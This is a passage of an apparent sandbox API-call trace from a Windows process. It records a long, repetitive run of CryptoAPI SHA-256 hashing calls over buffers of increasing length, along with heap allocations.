	[0119.032] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.032] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.032] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.033] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.033] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0119.033] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.033] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdcf8
	[0119.033] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fdcf8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdcf8, pdwDataLen=0x12942c) returned 1
	[0119.033] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.033] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.033] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.033] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.033] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0119.033] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.033] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdd20
	[0119.033] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fdd20, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdd20, pdwDataLen=0x12942c) returned 1
	[0119.033] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.033] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.033] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.034] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.034] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0119.034] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.034] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdd48
	[0119.034] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fdd48, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdd48, pdwDataLen=0x12942c) returned 1
	[0119.034] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.034] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.034] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.034] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.034] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0119.034] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.034] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdd70
	[0119.034] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fdd70, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdd70, pdwDataLen=0x12942c) returned 1
	[0119.034] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.034] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.034] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.035] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.035] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0119.035] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.035] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdd98
	[0119.035] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fdd98, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdd98, pdwDataLen=0x12942c) returned 1
	[0119.035] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.035] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.035] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.035] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.035] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0119.035] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.035] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fddc0
	[0119.035] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fddc0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fddc0, pdwDataLen=0x12942c) returned 1
	[0119.035] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.035] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.035] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.036] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.036] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0119.036] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.036] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdde8
	[0119.036] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fdde8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdde8, pdwDataLen=0x12942c) returned 1
	[0119.036] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.036] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.036] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.036] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.036] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0119.036] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.036] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fde10
	[0119.036] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fde10, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fde10, pdwDataLen=0x12942c) returned 1
	[0119.036] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.036] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.036] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.037] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.037] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0119.037] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.037] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fde38
	[0119.037] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fde38, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fde38, pdwDataLen=0x12942c) returned 1
	[0119.037] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.037] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.037] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.037] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.037] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0119.037] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.037] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fde60
	[0119.037] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fde60, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fde60, pdwDataLen=0x12942c) returned 1
	[0119.037] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.037] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.037] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.038] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.038] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0119.038] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.038] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fde88
	[0119.038] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fde88, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fde88, pdwDataLen=0x12942c) returned 1
	[0119.038] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.038] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.038] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.038] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.038] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0119.038] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.038] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdeb0
	[0119.038] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fdeb0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdeb0, pdwDataLen=0x12942c) returned 1
	[0119.038] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.038] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.038] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.039] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.039] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0119.039] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.039] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fded8
	[0119.039] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fded8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fded8, pdwDataLen=0x12942c) returned 1
	[0119.039] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.039] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.039] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.039] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.039] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0119.039] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.039] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdf00
	[0119.039] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fdf00, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdf00, pdwDataLen=0x12942c) returned 1
	[0119.039] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.039] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.039] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b7778) returned 1
	[0119.039] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x26b7778
	[0119.039] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.040] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.040] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0119.040] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.040] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdf28
	[0119.040] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fdf28, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdf28, pdwDataLen=0x12942c) returned 1
	[0119.040] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.040] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.040] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.040] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.040] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0119.040] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.040] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdf50
	[0119.040] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fdf50, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdf50, pdwDataLen=0x12942c) returned 1
	[0119.040] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.040] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.040] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.041] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.041] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0119.041] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.041] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdf78
	[0119.041] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fdf78, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdf78, pdwDataLen=0x12942c) returned 1
	[0119.041] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.041] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.041] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.041] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.041] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0119.041] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.041] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdfa0
	[0119.041] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fdfa0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdfa0, pdwDataLen=0x12942c) returned 1
	[0119.041] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.041] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.041] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.042] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.042] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0119.042] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.042] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdfc8
	[0119.042] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fdfc8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdfc8, pdwDataLen=0x12942c) returned 1
	[0119.042] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.042] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.042] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.042] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.042] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0119.042] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.042] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdff0
	[0119.042] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fdff0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdff0, pdwDataLen=0x12942c) returned 1
	[0119.042] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.042] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.042] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.043] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.043] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0119.043] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.043] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe018
	[0119.043] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe018, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe018, pdwDataLen=0x12942c) returned 1
	[0119.043] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.043] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.043] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.043] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.043] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0119.043] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.043] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe040
	[0119.043] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe040, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe040, pdwDataLen=0x12942c) returned 1
	[0119.043] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.043] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.043] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.044] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.044] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0119.044] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.044] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe068
	[0119.044] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe068, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe068, pdwDataLen=0x12942c) returned 1
	[0119.044] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.044] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.044] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.045] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.045] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0119.045] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.045] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe090
	[0119.045] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe090, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe090, pdwDataLen=0x12942c) returned 1
	[0119.045] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.045] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.045] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.045] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.045] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0119.045] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.045] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe0b8
	[0119.045] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe0b8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe0b8, pdwDataLen=0x12942c) returned 1
	[0119.045] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.045] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.045] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.045] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.046] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x180, dwFlags=0x0) returned 1
